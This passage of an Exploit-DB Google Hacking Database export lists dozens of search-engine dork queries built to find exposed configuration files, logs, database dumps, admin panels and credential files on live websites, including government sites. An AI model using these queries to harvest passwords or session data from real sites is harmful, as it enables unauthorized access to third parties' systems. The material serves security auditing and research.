Google search: inurl:&quot;sugarcrm.log&quot; ext:log -git -google
Author: nebo_oben</textualDescription>
<query>inurl:&quot;sugarcrm.log&quot; ext:log -git -google</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sugarcrm.log&quot; ext:log -git -google</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4655</id>
<link>https://www.exploit-db.com/ghdb/4655</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;test/php/test.html&quot; Plesk File</shortDescription>
<textualDescription>Description: This dork finds phpinfo file with Juicy Information about
Plesk systems.
</textualDescription>
<query>inurl:&quot;test/php/test.html&quot; Plesk File</query>
<querystring>https://www.google.com/search?q=inurl:&quot;test/php/test.html&quot; Plesk File</querystring>
<edb></edb>
<date>2018-01-11</date>
<author>Cr33pB0y</author>
</entry>
<entry>
<id>4143</id>
<link>https://www.exploit-db.com/ghdb/4143</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;trace&quot; ext:axd intext:&quot;password&quot;</shortDescription>
<textualDescription>the dork keyword is:
inurl:&quot;trace&quot; ext:axd intext:&quot;password&quot;
purpose of dork:
search for tracing files in the ASP.NET websites which might contain a
sensitive information such as the username and password entered to the
application.
discovered by: Asem Al Husaini (SFDA)</textualDescription>
<query>inurl:&quot;trace&quot; ext:axd intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;trace&quot; ext:axd intext:&quot;password&quot;</querystring>
<edb></edb>
<date>2015-12-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>3747</id>
<link>https://www.exploit-db.com/ghdb/3747</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;trace.axd&quot; ext:axd &quot;Application Trace&quot;</shortDescription>
<textualDescription>example google dork to find trace.axd, a file used for debugging asp that
reveals full http request details like cookie and other data that in many
cases can be used to hijack user-sessions, display plain-text
usernames/passwords and also serverinfo like pathnames
second with plain-text usernames and passwords along with sessiondata. this
file should be developer-only and not publicly available but seems to be
used quite often, usually hidden from google with robots.txt. Author: easypwn</textualDescription>
<query>inurl:&quot;trace.axd&quot; ext:axd &quot;Application Trace&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;trace.axd&quot; ext:axd &quot;Application Trace&quot;</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5665</id>
<link>https://www.exploit-db.com/ghdb/5665</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;web.config&quot; &amp; intext:&quot;Data Source&quot; &amp; &quot;User ID&quot; &amp; &quot;Password&quot; &amp; &quot;connectionString&quot; &amp; ext:config -git</shortDescription>
<textualDescription>##Google Dork: inurl:&quot;web.config&quot; &amp; intext:&quot;Data Source&quot; &amp; &quot;User ID&quot; &amp; &quot;Password&quot; &amp; &quot;connectionString&quot; &amp; ext:config -git
##Description: The above dork will show all the readable web.config files, which includes connection strings of database like server ip, database username, database password etc.
## Submission date: 12/12/2019.
## Author : Aamir Rehman.
## Social : fb.com/yousafzian2
</textualDescription>
<query>inurl:&quot;web.config&quot; &amp; intext:&quot;Data Source&quot; &amp; &quot;User ID&quot; &amp; &quot;Password&quot; &amp; &quot;connectionString&quot; &amp; ext:config -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;web.config&quot; &amp; intext:&quot;Data Source&quot; &amp; &quot;User ID&quot; &amp; &quot;Password&quot; &amp; &quot;connectionString&quot; &amp; ext:config -git</querystring>
<edb></edb>
<date>2019-12-12</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>8180</id>
<link>https://www.exploit-db.com/ghdb/8180</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Andrew Gimenez</textualDescription>
<query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:backup&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Andrew Gimenez</author>
</entry>
<entry>
<id>8181</id>
<link>https://www.exploit-db.com/ghdb/8181</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</shortDescription>
<textualDescription># Google Dork: inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Andrew Gimenez</textualDescription>
<query>inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content&quot; intitle:&quot;index.of&quot; intext:wp-config.php</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Andrew Gimenez</author>
</entry>
<entry>
<id>4561</id>
<link>https://www.exploit-db.com/ghdb/4561</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;wp-content/uploads/file-manager/log.txt&quot;</shortDescription>
<textualDescription>WordPress Plugin File Manager log file with interesting information.
Ing. Daniel Maldonado
http://www.caceriadespammers.com.ar</textualDescription>
<query>inurl:&quot;wp-content/uploads/file-manager/log.txt&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/uploads/file-manager/log.txt&quot;</querystring>
<edb></edb>
<date>2017-07-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4600</id>
<link>https://www.exploit-db.com/ghdb/4600</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;wp-security-audit-log&quot; ext:log</shortDescription>
<textualDescription>Finds Wordpress audit logs containing some interesting info about previous
attempts to audit the site
Dxtroyer
</textualDescription>
<query>inurl:&quot;wp-security-audit-log&quot; ext:log</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-security-audit-log&quot; ext:log</querystring>
<edb></edb>
<date>2017-10-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>8272</id>
<link>https://www.exploit-db.com/ghdb/8272</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;xslt?PAGE=C_4_0&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;xslt?PAGE=C_4_0&quot;
# Files Containing Juicy Info
# Date: 20/10/2023
# Exploit Reza Abasi</textualDescription>
<query>inurl:&quot;xslt?PAGE=C_4_0&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;xslt?PAGE=C_4_0&quot;</querystring>
<edb></edb>
<date>2023-10-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>3854</id>
<link>https://www.exploit-db.com/ghdb/3854</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;zendesk.com/attachments/token&quot; site:zendesk.com</shortDescription>
<textualDescription>zendesk is good ticketing system . It has thousands of clients. with the
above dork you can see the clients internal file attachments of the
tickets .
These file can be opened by anyone because they are not maintaining any
authentication token for this attachments
Internal source codes, doubts, ip's , passwords, can be disclosed in the
attachments</textualDescription>
<query>inurl:&quot;zendesk.com/attachments/token&quot; site:zendesk.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;zendesk.com/attachments/token&quot; site:zendesk.com</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5696</id>
<link>https://www.exploit-db.com/ghdb/5696</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;_notes/dwsync.xml&quot;</shortDescription>
<textualDescription># Google Dork: inurl:_notes/dwsync.xml&quot;
# Date: 21-01-2020
# Author: Marcelo Ruz S.</textualDescription>
<query>inurl:&quot;_notes/dwsync.xml&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;_notes/dwsync.xml&quot;</querystring>
<edb></edb>
<date>2020-01-21</date>
<author>Marcelo Ruz S.</author>
</entry>
<entry>
<id>8145</id>
<link>https://www.exploit-db.com/ghdb/8145</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*/signIn.do</shortDescription>
<textualDescription># Google Dork: inurl:*/signIn.do
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: ABHISHEK UZUMAKI</textualDescription>
<query>inurl:*/signIn.do</query>
<querystring>https://www.google.com/search?q=inurl:*/signIn.do</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>ABHISHEK UZUMAKI</author>
</entry>
<entry>
<id>3895</id>
<link>https://www.exploit-db.com/ghdb/3895</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*/webalizer/* intitle:&quot;Usage Statistics&quot;</shortDescription>
<textualDescription>*Obrigado,*</textualDescription>
<query>inurl:*/webalizer/* intitle:&quot;Usage Statistics&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*/webalizer/* intitle:&quot;Usage Statistics&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8194</id>
<link>https://www.exploit-db.com/ghdb/8194</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*/wp-content/plugins/contact-form-7/</shortDescription>
<textualDescription># Google Dork: inurl:*/wp-content/plugins/contact-form-7/
# Files Containing Juicy Info
# Date:26/05/2023
# Exploit Author: Bappe Sarker</textualDescription>
<query>inurl:*/wp-content/plugins/contact-form-7/</query>
<querystring>https://www.google.com/search?q=inurl:*/wp-content/plugins/contact-form-7/</querystring>
<edb></edb>
<date>2023-05-26</date>
<author>Bappe Sarker</author>
</entry>
<entry>
<id>399</id>
<link>https://www.exploit-db.com/ghdb/399</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*db filetype:mdb</shortDescription>
<textualDescription>More Microsoft Access databases for your viewing pleasure. Results may vary, but there have been passwords discovered with this search.</textualDescription>
<query>inurl:*db filetype:mdb</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%2Adb+filetype%3Amdb+</querystring>
<edb></edb>
<date>2004-08-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7795</id>
<link>https://www.exploit-db.com/ghdb/7795</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;</shortDescription>
<textualDescription># Google Dork: inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;
# Files Containing Juicy Info
# Date:13/11/2021
# Exploit Author: Vrushabh Kadam</textualDescription>
<query>inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*gov intitle:&quot;index of&quot; &quot;docker-compose&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Vrushabh Kadam</author>
</entry>
<entry>
<id>7726</id>
<link>https://www.exploit-db.com/ghdb/7726</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*gov intitle:&quot;index of/documents&quot;</shortDescription>
<textualDescription># Google Dork: inurl:*gov intitle:&quot;index of/documents&quot;
# Files Containing Juicy Info
# Date: 09/11/2021
# Exploit Author: Resham Kumar Chaudhary</textualDescription>
<query>inurl:*gov intitle:&quot;index of/documents&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*gov intitle:&quot;index of/documents&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Resham Kumar Chaudhary</author>
</entry>
<entry>
<id>7797</id>
<link>https://www.exploit-db.com/ghdb/7797</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*gov intitle:&quot;index of/documents&quot;</shortDescription>
<textualDescription># Google Dork: inurl:*gov intitle:&quot;index of/documents&quot;
# Files Containing Juicy Info
# Date:13/11/2021
# Exploit Author: Vrushabh Kadam</textualDescription>
<query>inurl:*gov intitle:&quot;index of/documents&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*gov intitle:&quot;index of/documents&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Vrushabh Kadam</author>
</entry>
<entry>
<id>7913</id>
<link>https://www.exploit-db.com/ghdb/7913</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:*org intitle:&quot;index of&quot; &quot;docker-compose&quot;</shortDescription>
<textualDescription># Google Dork: inurl:*org intitle:&quot;index of&quot; &quot;docker-compose&quot;
# Files Containing Juicy Info
# Date:16/06/2022
# Exploit Author: Hrishikesh Patra</textualDescription>
<query>inurl:*org intitle:&quot;index of&quot; &quot;docker-compose&quot;</query>
<querystring>https://www.google.com/search?q=inurl:*org intitle:&quot;index of&quot; &quot;docker-compose&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Hrishikesh Patra</author>
</entry>
<entry>
<id>5816</id>
<link>https://www.exploit-db.com/ghdb/5816</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:-cfg intext:&quot;password cipher&quot;</shortDescription>
<textualDescription># Google Dork: inurl:-cfg intext:&quot;password cipher&quot;
# By using this dork, passwords ciphers in configuration files can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:-cfg intext:&quot;password cipher&quot;</query>
<querystring>https://www.google.com/search?q=inurl:-cfg intext:&quot;password cipher&quot;</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8365</id>
<link>https://www.exploit-db.com/ghdb/8365</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:.&quot;install.appcenter.ms/orgs/&quot;</shortDescription>
<textualDescription># Google Dork: inurl:.&quot;install.appcenter.ms/orgs/&quot;
# Files Containing Juicy Info
# Date: 30/11/2023
# Exploit: Kamran Saifullah</textualDescription>
<query>inurl:.&quot;install.appcenter.ms/orgs/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:.&quot;install.appcenter.ms/orgs/&quot;</querystring>
<edb></edb>
<date>2023-11-30</date>
<author>Kamran Saifullah</author>
</entry>
<entry>
<id>4798</id>
<link>https://www.exploit-db.com/ghdb/4798</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:..//drivers/etc/ intitle:index of</shortDescription>
<textualDescription>Windows Host File used to map IP addresses.
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>inurl:..//drivers/etc/ intitle:index of</query>
<querystring>https://www.google.com/search?q=inurl:..//drivers/etc/ intitle:index of</querystring>
<edb></edb>
<date>2018-04-30</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>7892</id>
<link>https://www.exploit-db.com/ghdb/7892</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:.com index of apks</shortDescription>
<textualDescription># Google Dork: inurl:.com index of movies
# Pages Containing lot of Juicy Info
# Date: 18 December 2021
# Exploit Author: Ved Kolambkar</textualDescription>
<query>inurl:.com index of apks</query>
<querystring>https://www.google.com/search?q=inurl:.com index of apks</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Ved Kolambkar</author>
</entry>
<entry>
<id>3809</id>
<link>https://www.exploit-db.com/ghdb/3809</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:.com/configuration.php-dist</shortDescription>
<textualDescription>Finds the configuration files of the PHP Database on the server.
By
Chintan GurjarRahul Tygi</textualDescription>
<query>inurl:.com/configuration.php-dist</query>
<querystring>https://www.google.com/search?q=inurl:.com/configuration.php-dist</querystring>
<edb></edb>
<date>2012-11-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6189</id>
<link>https://www.exploit-db.com/ghdb/6189</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:.drone.yml intext:git config user.email</shortDescription>
<textualDescription>Google Dork: inurl:.drone.yml intext:git config user.email
Author: Rajat Sharma
Date: 2020-06-04</textualDescription>
<query>inurl:.drone.yml intext:git config user.email</query>
<querystring>https://www.google.com/search?q=inurl:.drone.yml intext:git config user.email</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Rajat Sharma</author>
</entry>
<entry>
<id>7768</id>
<link>https://www.exploit-db.com/ghdb/7768</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:.org intitle index.of &quot;inflation&quot;</shortDescription>
<textualDescription># Google Dork: inurl:.org intitle index.of &quot;inflation&quot;
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Hardik Jain</textualDescription>
<query>inurl:.org intitle index.of &quot;inflation&quot;</query>
<querystring>https://www.google.com/search?q=inurl:.org intitle index.of &quot;inflation&quot;</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Hardik Jain</author>
</entry>
<entry>
<id>7727</id>
<link>https://www.exploit-db.com/ghdb/7727</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:.php?=*php site:.nic.in</shortDescription>
<textualDescription># Google Dork: inurl:.php?=*php site:.nic.in
# Files Containing Juicy Info
# Date: 09/11/2021
# Exploit Author: Sagar Jana </textualDescription>
<query>inurl:.php?=*php site:.nic.in</query>
<querystring>https://www.google.com/search?q=inurl:.php?=*php site:.nic.in</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Sagar Jana</author>
</entry>
<entry>
<id>4793</id>
<link>https://www.exploit-db.com/ghdb/4793</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/.well-known/security.txt</shortDescription>
<textualDescription>Files Containing Juicy Info
This will return a list of all indexed websites that have
implemented the proposed security.txt standard (https://securitytxt.org/).
You could use this as a way to find companies that have bug bounty programs
that will pay you for discovering vulns or exploits.
*By:* edm0nd
https://twitter.com/Edmond_Major
</textualDescription>
<query>inurl:/.well-known/security.txt</query>
<querystring>https://www.google.com/search?q=inurl:/.well-known/security.txt</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>edm0nd</author>
</entry>
<entry>
<id>4707</id>
<link>https://www.exploit-db.com/ghdb/4707</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | inurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42</shortDescription>
<textualDescription>inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 |
inurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
PHP reveals potentially sensitive information via certain HTTP requests
that contain specific QUERY strings
ManhNho
</textualDescription>
<query>inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | inurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42</query>
<querystring>https://www.google.com/search?q=inurl:/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 | inurl:/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42</querystring>
<edb></edb>
<date>2018-03-22</date>
<author>ManhNho</author>
</entry>
<entry>
<id>7969</id>
<link>https://www.exploit-db.com/ghdb/7969</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/admin ext:config</shortDescription>
<textualDescription> Google Dork: inurl:/admin ext:config
# Files Containing Juicy Info
# Date:18/07/2022
# Exploit Author: Ranjeet Jaiswal</textualDescription>
<query>inurl:/admin ext:config</query>
<querystring>https://www.google.com/search?q=inurl:/admin ext:config</querystring>
<edb></edb>
<date>2022-07-18</date>
<author>Ranjeet Jaiswal</author>
</entry>
<entry>
<id>8316</id>
<link>https://www.exploit-db.com/ghdb/8316</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/admin.php</shortDescription>
<textualDescription># Google Dork: inurl:/admin.php
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Aashiq Ahamed</textualDescription>
<query>inurl:/admin.php</query>
<querystring>https://www.google.com/search?q=inurl:/admin.php</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>7300</id>
<link>https://www.exploit-db.com/ghdb/7300</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/admin/radeditorprovider/dialoghandler.aspx &quot;Loading the dialog...&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/admin/radeditorprovider/dialoghandler.aspx &quot;Loading
the dialog...&quot;
# Files Containing Juicy Info
# Date: 30/08/2021
# Exploit Author: Red Blue Ops
</textualDescription>
<query>inurl:/admin/radeditorprovider/dialoghandler.aspx &quot;Loading the dialog...&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/admin/radeditorprovider/dialoghandler.aspx &quot;Loading the dialog...&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>5526</id>
<link>https://www.exploit-db.com/ghdb/5526</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/application/config/database.php*</shortDescription>
<textualDescription>Sensitive Directories and Juice Informations in open public Git/SVN
@hex0x42424242</textualDescription>
<query>inurl:/application/config/database.php*</query>
<querystring>https://www.google.com/search?q=inurl:/application/config/database.php*</querystring>
<edb></edb>
<date>2019-09-13</date>
<author>Renato Hormazabal</author>
</entry>
<entry>
<id>1228</id>
<link>https://www.exploit-db.com/ghdb/1228</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/cgi-bin/pass.txt</shortDescription>
<textualDescription>Passwords</textualDescription>
<query>inurl:/cgi-bin/pass.txt</query>
<querystring>https://www.google.com/search?complete=1&amp;q=inurl%3A%2Fcgi-bin%2Fpass.txt</querystring>
<edb></edb>
<date>2005-12-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4795</id>
<link>https://www.exploit-db.com/ghdb/4795</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/daten/webyep-log.txt</shortDescription>
<textualDescription>Access to logs files.
Author: Marcin W. Brzózka
https://www.linkedin.com/in/marcin-brz%C3%B3zka-044006162/
</textualDescription>
<query>inurl:/daten/webyep-log.txt</query>
<querystring>https://www.google.com/search?q=inurl:/daten/webyep-log.txt</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>Marcin W. Brzózka</author>
</entry>
<entry>
<id>4014</id>
<link>https://www.exploit-db.com/ghdb/4014</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/dbg-wizard.php</shortDescription>
<textualDescription># Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk
DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script called
dbg-wizard.php which when placed in the root folder of a web site and
executed provides instructions to the user about setting up their web
server so the debugger can be used.
It is not meant to be present on a live site as it exposes details
about software configurations and versions which might allow an
attacker to discover other vulnerabilities. If the DBG shared library
is also installed it will expose that fact and potentially assist an
attacker in crafting a request to start a debug session in which they
could do anything that can be done through a PHP script, including
reading files and accessing database entries.
--
Alfred Armstrong
</textualDescription>
<query>inurl:/dbg-wizard.php</query>
<querystring>https://www.google.com/search?q=inurl:/dbg-wizard.php</querystring>
<edb></edb>
<date>2015-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4596</id>
<link>https://www.exploit-db.com/ghdb/4596</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/Divi/Changelog.txt /Divi/Changelog.txt</shortDescription>
<textualDescription>*Category:*
files containing juicy info
*Summary:*
A Google dork that gives the information about wordpress Divi plugin
changelog
*Dork discovered by:*
m0be1</textualDescription>
<query>inurl:/Divi/Changelog.txt /Divi/Changelog.txt</query>
<querystring>https://www.google.com/search?q=inurl:/Divi/Changelog.txt /Divi/Changelog.txt</querystring>
<edb></edb>
<date>2017-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4684</id>
<link>https://www.exploit-db.com/ghdb/4684</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/fantastico_fileslist.txt + ext:txt</shortDescription>
<textualDescription>inurl:/fantastico_fileslist.txt + ext:txt
This dork show results which have fantastico_fileslist.txt
This file contains a list of all the files from the current directory. The
contents of this file may expose sensitive information to an attacker.
ManhNho
</textualDescription>
<query>inurl:/fantastico_fileslist.txt + ext:txt</query>
<querystring>https://www.google.com/search?q=inurl:/fantastico_fileslist.txt + ext:txt</querystring>
<edb></edb>
<date>2018-02-28</date>
<author>ManhNho</author>
</entry>
<entry>
<id>5295</id>
<link>https://www.exploit-db.com/ghdb/5295</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/filedown.php?file=</shortDescription>
<textualDescription># Google Dork: inurl:/filedown.php?file=
# Author: Sayak Naskar
# Date: 29.07.2019
</textualDescription>
<query>inurl:/filedown.php?file=</query>
<querystring>https://www.google.com/search?q=inurl:/filedown.php?file=</querystring>
<edb></edb>
<date>2019-07-30</date>
<author>Sayak Naskar</author>
</entry>
<entry>
<id>5147</id>
<link>https://www.exploit-db.com/ghdb/5147</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/files/_log/ filetype:log</shortDescription>
<textualDescription>inurl:/files/_log/ filetype:log
</textualDescription>
<query>inurl:/files/_log/ filetype:log</query>
<querystring>https://www.google.com/search?q=inurl:/files/_log/ filetype:log</querystring>
<edb></edb>
<date>2019-03-11</date>
<author>Thalysson Sarmento</author>
</entry>
<entry>
<id>4700</id>
<link>https://www.exploit-db.com/ghdb/4700</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/gravity_forms/logs ext:txt</shortDescription>
<textualDescription>Exposes gravity forms WordPress plugin and add-on debugging logs.
This can lead to exposure of form submission information including transaction data, PII and disclosure of plugin versions and directory structures.
Happy Hunting
@Shadow0pz</textualDescription>
<query>inurl:/gravity_forms/logs ext:txt</query>
<querystring>https://www.google.com/search?q=inurl:/gravity_forms/logs ext:txt</querystring>
<edb></edb>
<date>2018-03-16</date>
<author>Shadow0pz</author>
</entry>
<entry>
<id>8373</id>
<link>https://www.exploit-db.com/ghdb/8373</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/HappyAxis.jsp</shortDescription>
<textualDescription># Google Dork: inurl:/HappyAxis.jsp
# Files Containing Juicy Info
# Date: 06/12/2023
# Exploit: Aashiq Ahamed</textualDescription>
<query>inurl:/HappyAxis.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/HappyAxis.jsp</querystring>
<edb></edb>
<date>2023-12-06</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>7048</id>
<link>https://www.exploit-db.com/ghdb/7048</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/inicis/ ext:log</shortDescription>
<textualDescription># Google Dork: inurl:/inicis/ ext:log
# Files Containing Juicy Info
# Exploit Author: J. Igor Melo
</textualDescription>
<query>inurl:/inicis/ ext:log</query>
<querystring>https://www.google.com/search?q=inurl:/inicis/ ext:log</querystring>
<edb></edb>
<date>2021-08-13</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4578</id>
<link>https://www.exploit-db.com/ghdb/4578</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/maint/repair.php?repair=1</shortDescription>
<textualDescription>Wordpress database repair displaying active tables
- ThePentester</textualDescription>
<query>inurl:/maint/repair.php?repair=1</query>
<querystring>https://www.google.com/search?q=inurl:/maint/repair.php?repair=1</querystring>
<edb></edb>
<date>2017-09-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>7667</id>
<link>https://www.exploit-db.com/ghdb/7667</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/mutillidae/ &quot;Toggle Hints&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/mutillidae/ &quot;Toggle Hints&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Kin Wong</textualDescription>
<query>inurl:/mutillidae/ &quot;Toggle Hints&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/mutillidae/ &quot;Toggle Hints&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Kin Wong</author>
</entry>
<entry>
<id>4391</id>
<link>https://www.exploit-db.com/ghdb/4391</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/o/oauth2 inurl:client_id</shortDescription>
<textualDescription>Searching for this will return various Client IDs used with the authentication process within the OAuth2 protocol.
- therealjayvi</textualDescription>
<query>inurl:/o/oauth2 inurl:client_id</query>
<querystring>https://www.google.com/search?q=inurl:/o/oauth2 inurl:client_id</querystring>
<edb></edb>
<date>2017-02-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7663</id>
<link>https://www.exploit-db.com/ghdb/7663</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/package.json</shortDescription>
<textualDescription># Google Dork: inurl:/package.json
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Jaydev Ahire</textualDescription>
<query>inurl:/package.json</query>
<querystring>https://www.google.com/search?q=inurl:/package.json</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Jaydev Ahire</author>
</entry>
<entry>
<id>8237</id>
<link>https://www.exploit-db.com/ghdb/8237</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/phpMyAdmin/index.php?server=1</shortDescription>
<textualDescription># Google Dork: inurl:/phpMyAdmin/index.php?server=1
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Aashiq Ahamed</textualDescription>
<query>inurl:/phpMyAdmin/index.php?server=1</query>
<querystring>https://www.google.com/search?q=inurl:/phpMyAdmin/index.php?server=1</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>7421</id>
<link>https://www.exploit-db.com/ghdb/7421</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:/plugins/pie-register/</shortDescription>
<textualDescription># Google Dork: inurl:/plugins/pie-register/
